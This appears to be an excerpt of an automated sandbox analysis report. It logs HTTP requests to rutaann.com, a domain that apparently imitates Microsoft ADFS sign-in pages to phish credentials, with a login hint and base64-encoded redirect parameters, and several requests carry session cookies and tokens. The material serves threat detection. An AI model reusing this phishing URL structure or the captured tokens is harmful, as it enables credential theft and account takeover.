      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rutaann.com/?qrc=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; fpc=Ah-8cUX3klZPh9iRdc8cPP4; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
      Source: global trafficHTTP traffic detected: GET /?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM= HTTP/1.1Host: rutaann.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://rutaann.com/?qrc=john.smith%40microsoft.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA
      Source: global trafficHTTP traffic detected: GET /adfs/portal/css/style.css?id=662A3B02F40F2A4B3BB97889A3E6C681EFB452728D8E77E0F97203AE5C53057E HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rutaann.com/?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM=Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA
      Source: global trafficHTTP traffic detected: GET /adfs/portal/logo/logo.png?id=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960 HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rutaann.com/?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM=Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA
      Source: global trafficHTTP traffic detected: GET /adfs/portal/logo/logo.png?id=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960 HTTP/1.1Host: rutaann.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA
      Source: global trafficHTTP traffic detected: GET /adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0 HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rutaann.com/?5cugphbw6=aHR0cHM6Ly9tc2Z0LnN0cy5taWNyb3NvZnQuY29tL2FkZnMvbHMvP2xvZ2luX2hpbnQ9am9obi5zbWl0aCU0MG1pY3Jvc29mdC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZGE5OTZiMmUtNjc1Mi00YmQ2LWFiOGYtYWQ5MGZjNWJhZTY4JnVzZXJuYW1lPWpvaG4uc21pdGglNDBtaWNyb3NvZnQuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUE0Mkt3MHNrb0tTa290dExYTDhndktrbk0wY3ZOVEM3S0w4NVBLOG5QeThuTVM5Vkx6c19WeXk5S3owd0JzWXFFdUFUMHNtZmVDa3FfNXIyNmYtMkVQOUhyTWxZeEtoTTJRdjhDSS1NTFJzWkpUQkpaLVJsNWVzVzVtU1VaRG5CMUlCVzNtQVQ5aTlJOVU4S0wzVkpUVW9zU1N6THo4eTZ3Q0x4aTRURmd0dUxnNEJKZ2tHQlFZUGpCd3JpSUZlaUkxd2RfTG4xYzlkdXJzZjhQTzFPZkM4TXBWbjB2VV9PQXN2THlFUGRNUzljQTR4UnZ2Mnh2Ri05RWt4RF9TaU5YbHlxWHBDZ2ZSd196aUh5TGN0TlFXd3Nyd3dsc1FoUFltRTZ4TVh4Z1kteGdaNWpGem5DQWtfRUFMOE1QdnRXblZsemU4X3ZXTzQ4TkFnd1BCQmdBMCM=Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvz
      Source: global trafficHTTP traffic detected: GET /adfs/portal/illustration/illustration.jpg?id=D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3 HTTP/1.1Host: rutaann.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEqPrgSbbanBGwSM8_I6JXOi-TE6X2O8xKzueATAbiaU4sBIuui8bpr0BdmOJsZE8DLOr4A8-7OQfHuzzeJtwCnnQVBrMnFBJY0NjIqt5DVhmZmqdFyng9aIxrFbOVTJiLgkMF8heP3Q4-tGzh20V7mxxPVDY7R50Fh2BVu_pVg7sgztfUzauHNmnPbowN57PXvVBZutfRph9QjqxwKZKDUVW476RoLk_KTMUwP9xV91SjrD2Tsa2BS0VGJiZxyC_0H51_uh3sOoA7x1qwzjDa0Tyw7rE-3MTJcS3FLo2xnN4GMX_nnnUWLqrFrArT4lbFZKIAA; fpc=Ah-8cUX3klZPh9iRdc8cPP64vjNwAQAAADwJdd8OAAAA; ai_user=j4ODj|2025-03-25T20:29:54.636Z; ai_session=mqSRh|1742934594637.7|1742934594637.7
